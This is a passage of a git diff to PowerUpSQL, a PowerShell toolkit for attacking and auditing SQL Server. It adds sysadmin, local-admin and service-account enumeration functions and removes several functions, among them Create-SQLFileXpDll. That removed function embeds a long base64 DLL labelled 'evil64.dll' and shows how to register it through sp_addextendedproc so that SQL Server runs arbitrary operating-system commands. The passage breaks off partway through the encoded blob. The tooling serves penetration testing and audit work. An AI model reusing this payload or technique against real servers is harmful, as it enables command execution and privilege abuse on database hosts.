'samaccountname,displayname' -UseAdHoc + }else{ + $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=user)(memberOf=$DN))" -LdapFields 'samaccountname,displayname' + } + + $Results | ForEach-Object { + $TableMembers.Rows.Add($FilterGroup,$_.samaccountname,$_.displayname) | Out-Null } + + $TableMembers + } -} + End + { + } +} -# ------------------------------------------- -# Function: Get-ComputerNameFromInstance -# ------------------------------------------ +# ---------------------------------- +# Get-SQLSysadminCheck +# ---------------------------------- # Author: Scott Sutherland -Function Get-ComputerNameFromInstance +Function Get-SQLSysadminCheck { <# .SYNOPSIS - Parses computer name from a provided instance. + Check if login is has sysadmin privilege on the target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. .PARAMETER Instance - SQL Server instance to parse. + SQL Server instance to connection to. .EXAMPLE - PS C:\> Get-ComputerNameFromInstance -Instance SQLServer1\STANDARDDEV2014 - SQLServer1 + PS C:\> Get-SQLSysadminCheck -Instance SQLServer1\STANDARDDEV2014 + + ComputerName Instance IsSysadmin + ------------ -------- ---------- + SQLServer1 SQLServer1\STANDARDDEV2014 Yes + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcure -Verbose -NoDefaults #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipeline = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server instance.')] - [string]$Instance + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose ) - # Parse ComputerName from provided instance - If ($Instance) + Begin { - $ComputerName = $Instance.split('\')[0].split(',')[0] + # Data for output + $TblSysadminStatus = New-Object -TypeName System.Data.DataTable + + # Setup CredentialName filter + if($CredentialName) + { + $CredentialNameFilter = " WHERE name like '$CredentialName'" + } + else + { + $CredentialNameFilter = '' + } + } - else + + Process { - $ComputerName = $env:COMPUTERNAME + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Define Query + $Query = "SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + CASE + WHEN IS_SRVROLEMEMBER('sysadmin') = 0 THEN 'No' + ELSE 'Yes' + END as IsSysadmin" + + # Execute Query + $TblSysadminStatusTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblSysadminStatus = $TblSysadminStatus + $TblSysadminStatusTemp } - Return $ComputerName + End + { + # Return data + $TblSysadminStatus + } } -# ------------------------------------------- -# Function: Get-SQLServiceLocal -# ------------------------------------------- +# ---------------------------------- +# Get-SQLLocalAdminCheck +# ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServiceLocal +Function Get-SQLLocalAdminCheck { <# .SYNOPSIS - Returns local SQL Server services using Get-WmiObject -Class win32_service. This can only be run against the local server. - .EXAMPLE - PS C:\> Get-SQLServiceLocal | Format-Table -AutoSize + Check if the current Windows user is running in a local adminsitrator context. + PS C:\> Get-SQLLocalAdminCheck - ComputerName ServiceDisplayName ServiceName ServicePath - ------------ ------------------ ----------- ----------- - SQLServer1 SQL Server Integration Services 12.0 MsDtsServer120 "C:\Program Files\Microsoft SQL Server\120\DTS\Binn\MsDt... - SQLServer1 SQL Server Analysis Services (STANDARDDEV2014) MSOLAP$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSAS12.STANDARDDE... - SQLServer1 SQL Server (SQLEXPRESS) MSSQL$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... - SQLServer1 SQL Server (STANDARDDEV2014) MSSQL$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... - SQLServer1 SQL Full-text Filter Daemon Launcher (MSSQLSERVER) MSSQLFDLauncher "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... - SQLServer1 SQL Full-text Filter Daemon Launcher (SQLEXPRESS) MSSQLFDLauncher$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... - SQLServer1 SQL Full-text Filter Daemon Launcher (STANDARDDEV2014) MSSQLFDLauncher$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... - SQLServer1 SQL Server (MSSQLSERVER) MSSQLSERVER "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... - SQLServer1 SQL Server Analysis Services (MSSQLSERVER) MSSQLServerOLAPService "C:\Program Files\Microsoft SQL Server\MSAS12.MSSQLSERVE... - SQLServer1 SQL Server Reporting Services (MSSQLSERVER) ReportServer "C:\Program Files\Microsoft SQL Server\MSRS12.MSSQLSERVE... - SQLServer1 SQL Server Reporting Services (SQLEXPRESS) ReportServer$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSRS12.SQLEXPRESS... - SQLServer1 SQL Server Reporting Services (STANDARDDEV2014) ReportServer$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSRS12.STANDARDDE... - SQLServer1 SQL Server Distributed Replay Client SQL Server Distributed Replay Client "C:\Program Files (x86)\Microsoft SQL Server\120\Tools\D... - SQLServer1 SQL Server Distributed Replay Controller SQL Server Distributed Replay Controller "C:\Program Files (x86)\Microsoft SQL Server\120\Tools\D... - SQLServer1 SQL Server Agent (SQLEXPRESS) SQLAgent$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... - SQLServer1 SQL Server Agent (STANDARDDEV2014) SQLAgent$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... - SQLServer1 SQL Server Browser SQLBrowser "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\s... - SQLServer1 SQL Server Agent (MSSQLSERVER) SQLSERVERAGENT "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... - SQLServer1 SQL Server VSS Writer SQLWriter "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwrit... + $true #> Begin { - # Table for output - $TblLocalInstances = New-Object -TypeName System.Data.DataTable - $null = $TblLocalInstances.Columns.Add('ComputerName') - $null = $TblLocalInstances.Columns.Add('ServiceDisplayName') - $null = $TblLocalInstances.Columns.Add('ServiceName') - $null = $TblLocalInstances.Columns.Add('ServicePath') - $null = $TblLocalInstances.Columns.Add('ServiceAccount') - $null = $TblLocalInstances.Columns.Add('ServiceState') } Process { - # Grab SQL Server services based on file path - $SqlServices = Get-WmiObject -Class win32_service | - Where-Object -FilterScript { - $_.pathname -like '*Microsoft SQL Server*' - } | - Select-Object -Property DisplayName, PathName, Name, StartName, State, SystemName + # Get current windows user + $WinCurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent() - # Add recrds to SQL Server instance table - $SqlServices | - ForEach-Object -Process { - $null = $TblLocalInstances.Rows.Add( - [string]$_.SystemName, - [string]$_.DisplayName, - [string]$_.Name, - [string]$_.PathName, - [string]$_.StartName, - [string]$_.State) - } + # Get current windows username + $WinCurrentUserName = $WinCurrentUser.name + + # Get current windows user's groups + $WinGroups = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($WinCurrentUser) + + # Check if the current windows user/groups are local administrators / process is elevated + $WinRoleCheck = [System.Security.Principal.WindowsBuiltInRole]::Administrator + + # Return true or false + $WinGroups.IsInRole($WinRoleCheck) } End { - - # Status User - $LocalInstanceCount = $TblLocalInstances.rows.count - - # Return data - $TblLocalInstances } } - -# ------------------------------------------- -# Function: Create-SQLFileXpDll -# ------------------------------------------- -function Create-SQLFileXpDll +# ---------------------------------- +# Get-SQLServiceAccount +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLServiceAccount { <# .SYNOPSIS - This script can be used to generate a DLL file with an exported function that can be registered as an - extended stored procedure in SQL Server. The exported function can be configured to run any - Windows command. This script is intended to be used to test basic SQL Server audit controls around - the sp_addextendedproc and sp_dropextendedproc stored procedures used to register and unregister - extended stored procedures. - .PARAMETER ExportName - Name of the exported function that will be created. - .PARAMETER Command - Operating system command that the exported function will run. - .PARAMETER OutFile - Name of the Dll file to write to. + Returns a list of service account names for SQL Servers services by querying the registry with xp_regread. This can be executed against remote systems. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. .EXAMPLE - PS C:\temp> Create-SQLFileXpDll -OutFile c:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test - - Creating DLL c:\temp\test.dll - - Exported function name: xp_test - - Exported function command: "echo test > c:\temp\test.txt" - - DLL written - - Manual test: rundll32 c:\temp\test.dll,xp_test - - SQL Server Notes - The exported function can be registered as a SQL Server extended stored procedure. Options below: - - Register xp via local disk: sp_addextendedproc 'xp_test', 'c:\temp\myxp.dll' - - Register xp via UNC path: sp_addextendedproc 'xp_test', '\\servername\pathtofile\myxp.dll' - - Unregister xp: sp_dropextendedproc 'xp_test' - .LINK - http://en.cppreference.com/w/cpp/utility/program/system - http://www.netspi.com - - .NOTES - The extended stored procedure template used to create the DLL shell was based on the following stackoverflow post: - http://stackoverflow.com/questions/12749210/how-to-create-a-simple-dll-for-a-custom-sql-server-extended-stored-procedure + PS C:\> Get-SQLServiceAccount -Instance SQLServer1\STANDARDDEV2014 - Modified source code used to create the DLL can be found at the link below: - https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/xp_evil_template.cpp + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DBEngineLogin : LocalSystem + AgentLogin : NT Service\SQLAgent$STANDARDDEV2014 + BrowserLogin : NT AUTHORITY\LOCALSERVICE + WriterLogin : LocalSystem + AnalysisLogin : NT Service\MSOLAP$STANDARDDEV2014 + ReportLogin : NT Service\ReportServer$STANDARDDEV2014 + IntegrationLogin : NT Service\MsDtsServer120 - The method used to patch the DLL was based on Will Schroeder "Invoke-PatchDll" function found in the PowerUp toolkit: - https://github.com/HarmJ0y/PowerUp + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLServiceAccount -Verbose #> - [CmdletBinding()] Param( - [Parameter(Mandatory = $false, - HelpMessage = 'Operating system command to run.')] - [string]$Command, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'Name of exported function.')] - [string]$ExportName, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, [Parameter(Mandatory = $false, - HelpMessage = 'Dll file to write to.')] - [string]$OutFile - ) - - # ----------------------------------------------- - # Define the DLL file and command to be executed - # ----------------------------------------------- - - # This is the base64 encoded evil64.dll -command: base64 -w 0 evil64.dll > evil64.dll.b64 - $DllBytes64 = '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zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxAVVdIgezIAAAASIvsSIv8uTIAAAC4zMzMzPOruAEAAABIjaXIAAAAX13DzMzMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzEiJVCQQSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMTIlEJBiJVCQQSIlMJAhVV0iB7NgAAABIi+xIi/y5NgAAALjMzMzM86tIi4wk+AAAAIuF+AAAAImFwAAAALgBAAAASI2l2AAAAF9dw8zMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhVV0iB7AgBAABIjWwkIEiL/LlCAAAAuMzMzMzzq0iLjCQoAQAASI0Fb4EAAEiJRQhIi00I/xUZCwEAuAEAAABIjaXoAAAAX13DzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiNBQH7///DzMzMzMzMzMxIjQUL+v//w8zMzMzMzMzMSIPsOIA96ckAAAB1LUG5AQAAAMYF2skAAAFFM8DHRCQgAAAAADPSM8nolPj//0iLyEiDxDjpVfn//0iDxDjDzMzMzMzMzMzMzMzMzMzMzMxIg+w4QbkBAAAAx0QkIAEAAABFM8Az0jPJ6FT4//9Ig8Q4w8zMzMzMzMzMzMzMzMxMiUQkGIlUJBBIiUwkCEiD7DiLRCRIiUQkJIN8JCQAdCiDfCQkAXQQg3wkJAJ0OoN8JCQDdD3rRUiLVCRQSItMJEDoaQAAAOs5SIN8JFAAdAfGRCQgAesFxkQkIAAPtkwkIOjpAQAA6xnoH/j//w+2wOsP6Cn4//8PtsDrBbgBAAAASIPEOMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiJVCQQSIlMJAhIg+xIM8no2vn//w+2wIXAdQczwOkjAQAA6Dv5//+IRCQgxkQkIQGDPeDIAAAAdAq5BwAAAOii+P//xwXKyAAAAQAAAOhv+f//D7bAhcB1Autw6K34//9IjQ2/+P//6EL4///okvj//0iNDZD4///oMfj//+ge9///SI0VBnoAAEiNDe94AADog/f//4XAdALrMOiA+f//D7bAhcB1AusiSI0Vv3cAAEiNDah2AADoQvj//8cFUcgAAAIAAADGRCQhAA+2TCQg6Mb2//8PtkQkIYXAdAQzwOtj6F73//9IiUQkKEiLRCQoSIM4AHQ7SItMJCjo1vb//w+2wIXAdCpIi0QkKEiLAEiJRCQwSItMJDDoWPf//0yLRCRYugIAAABIi0wkUP9UJDCLBY/HAAD/wIkFh8cAALgBAAAASIPESMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMiEwkCEiD7DiDPRnHAAAAfwQzwOtkiwUNxwAA/8iJBQXHAADom/f//4hEJCCDPUXHAAACdAq5BwAAAOgH9///6Iv1///HBSrHAAAAAAAA6NX2//8PtkwkIOif9f//M9IPtkwkQOid9f//D7bAhcB1BDPA6wW4AQAAAEiDxDjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEyJRCQYiVQkEEiJTCQISIPsSMdEJDABAAAAg3wkWAF0B4N8JFgCdUZMi0QkYItUJFhIi0wkUOh1AQAAiUQkMIN8JDAAdQXp8AAAAEyLRCRgi1QkWEiLTCRQ6LL8//+JRCQwg3wkMAB1BenNAAAAg3wkWAF1CkiLTCRQ6NL1//9Mi0QkYItUJFhIi0wkUOhF9///iUQkMIN8JFgBdTqDfCQwAHUzTItEJGAz0kiLTCRQ6CL3//9Mi0QkYDPSSItMJFDoSvz//0yLRCRgM9JIi0wkUOjZAAAAg3wkWAF1B4N8JDAAdAeDfCRYAHUKSItMJFDol/X//4N8JFgAdAeDfCRYA3U3TItEJGCLVCRYSItMJFDo+fv//4lEJDCDfCQwAHUC6xdMi0QkYItUJFhIi0wkUOh5AAAAiUQkMOsIx0QkMAAAAACLRCQwSIPESMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEyJRCQYiVQkEEiJTCQISIPsOEiDPWahAAAAdQe4AQAAAOsoSIsFVqEAAEiJRCQgSItMJCDoT/T//0yLRCRQi1QkSEiLTCRA/1QkIEiDxDjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxMiUQkGIlUJBBIiUwkCEiD7ChMi0QkQItUJDhIi0wkMOjL+v//SIPEKMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMTIlEJBiJVCQQSIlMJAhIg+wog3wkOAF1Bei/8///TItEJECLVCQ4SItMJDDob/3//0iDxCjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxIiwXZwwAAw8zMzMzMzMzMSIsF0cMAAMPMzMzMzMzMzIP5BHcPSGPBSI0NYaAAAEiLBMHDM8DDzMzMzMzMzMzMuAUAAADDzMzMzMzMzMzMzEiLBYnDAABIiQ2CwwAASMcFf8MAAAAAAADDzMzMzMzMSIsFccMAAEiJDWrDAABIxwVXwwAAAAAAAMPMzMzMzMyD+QR3FUhjwUyNBdnBAABBiwyAQYkUgIvBw4PI/8PMzMzMzMzMzMzMzMzMzMzMzMxIiUwkCEiD7Cgz0kiLBdbBAAC5QAAAAEj38UiLwkiLDcTBAABIi1QkMEgz0UiLyovQ6IPy//9Ig8Qow8zMzMzMzMzMzMzMzMzMzMzMzMzMzEiJTCQISIPsKDPSSIsFhsEAALlAAAAASPfxSIvCuUAAAABIK8hIi8GL0EiLTCQw6DXy//9IMwVdwQAASIPEKMPMzMzMzMzMzMzMzMzMzMzMiVQkEEiJTCQIi0QkEA+2yEiLRCQISNPIw8zMzMzMzMxIiVQkEEiJTCQISIPsOEiLRCRASIlEJBBIi0QkEEhjQDxIi0wkEEgDyEiLwUiJRCQgSItEJCBIiUQkCEiLRCQID7dAFEiLTCQISI1EARhIiUQkGEiLRCQID7dABkhrwChIi0wkGEgDyEiLwUiJRCQoSItEJBhIiQQk6wxIiwQkSIPAKEiJBCRIi0QkKEg5BCR0LUiLBCSLQAxIOUQkSHIdSIsEJItADEiLDCQDQQiLwEg5RCRIcwZIiwQk6wTrvDPASIPEOMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhIg+woSIN8JDAAdQQywOtwSItEJDBIiQQkSIsEJA+3AD1NWgAAdAQywOtVSIsEJEhjQDxIiwwkSAPISIvBSIlEJBBIi0QkEEiJRCQISItEJAiBOFBFAAB0BDLA6yNIi0QkCEiDwBhIiUQkGEiLRCQYD7cAPQsCAAB0BDLA6wKwAUiDxCjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxlSIsEJTAAAADDzMzMzMzMSIPsSOhm8f//hcB1BDLA60zoXvH//0iLQAhIiUQkKEiLRCQoSIlEJDBIjQ3AwAAAM8BIi1QkMPBID7ERSIlEJCBIg3wkIAB0EkiLRCQgSDlEJCh1BLAB6wTrxDLASIPESMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxIg+wo6Obw//+FwHQH6PPu///rBeg18f//sAFIg8Qow8zMzMzMzMzMzMzMzMzMzMxIg+woM8noffD//w+2wIXAdQQywOsCsAFIg8Qow8zMzMzMzMzMzMzMzMzMzMzMzMxIg+wo6CLw//8PtsCFwHUEMsDrF+jp8P//D7bAhcB1CegQ8P//MsDrArABSIPEKMPMzMzMzMzMzMzMzMzMzMzMSIPsKOh17v//6Ofv//+wAUiDxCjDzMzMzMzMzMzMzMxMiUwkIEyJRCQYiVQkEEiJTCQISIPsOOgT8P//hcB1K4N8JEgBdSRIi0QkWEiJRCQgSItMJCDoze7//0yLRCRQM9JIi0wkQP9UJCBIi1QkaItMJGDow+7//0iDxDjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiD7Cjopu///4XAdA5IjQ3kvgAA6GTv///rDuiG7v//hcB1BeiR7v//SIPEKMPMzMzMzMzMzMzMzMzMzMzMzMxIg+woM8nogu///+js7v//SIPEKMPMzMzMzMzMzMzMzIlMJAhIg+wog3wkMAB1B8YFwr4AAAHoSu3//+gg7///D7bAhcB1BDLA6xnoAe///w+2wIXAdQszyeiB7f//MsDrArABSIPEKMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzIlMJAhWV0iD7GiDvCSAAAAAAHQUg7wkgAAAAAF0CrkFAAAA6A7u///owu7//4XAdESDvCSAAAAAAHU6SI0N9r0AAOiP7v//hcB0BzLA6aQAAABIjQ33vQAA6Hju//+FwHQHMsDpjQAAALAB6YYAAADpgQAAAEjHwf/////oz+z//0iJRCQgSItEJCBIiUQkKEiLRCQgSIlEJDBIi0QkIEiJRCQ4SI0Fjb0AAEiNTCQoSIv4SIvxuRgAAADzpEiLRCQgSIlEJEBIi0QkIEiJRCRISItEJCBIiUQkUEiNBW69AABIjUwkQEiL+EiL8bkYAAAA86SwAUiDxGhfXsPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhIg+xYSItEJGBIiUQkOEiNBVbb/v9IiUQkKEiLTCQo6Ff7//8PtsCFwHUEMsDrUkiLRCQoSItMJDhIK8hIi8FIiUQkQEiLVCRASItMJCjoKPr//0iJRCQwSIN8JDAAdQQywOsdSItEJDCLQCQlAAAAgIXAdAQywOsIsAHrBDLA6wBIg8RYw8zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMyITCQISIPsKOjy7P//hcB1AusXD7ZEJDCFwHQC6wwzwEiNDVm8AABIhwFIg8Qow8zMzMzMzMzMzMzMzMzMzMzMiFQkEIhMJAhIg+woD7YFNbwAAIXAdA0PtkQkOIXAdASwAesWD7ZMJDDoQez//w+2TCQw6Pfq//+wAUiDxCjDzMzMzMzMzMzMzMzMzMzMzMxIiUwkCEiD7EhIiw2ouwAA6Avr//9IiUQkMEiDfCQw/3UsSItMJFDomOz//4XAdQxIi0QkUEiJRCQg6wlIx0QkIAAAAABIi0QkIOsx6y9Ii1QkUEiNDV67AADo/Ov//4XAdQxIi0QkUEiJRCQo6wlIx0QkKAAAAABIi0QkKEiDxEjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiJTCQISIPsOEiLDRC7AADoW+r//0iJRCQgSIN8JCD/dQ5Ii0wkQOhO6v//6x3rG0iLRCRASIlEJChIi1QkKEiNDdq6AADoYOv//0iDxDjDzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxIiUwkCEiD7DhIi0wkQOix6f//SIXAdArHRCQgAAAAAOsIx0QkIP////+LRCQgSIPEOMPMzMzMzMzMzMzMzMzMSIPsSEjHRCQoAAAAAEi4MqLfLZkrAABIOQXquAAAdBZIiwXhuAAASPfQSIkF37gAAOnXAAAASI1MJCj/FU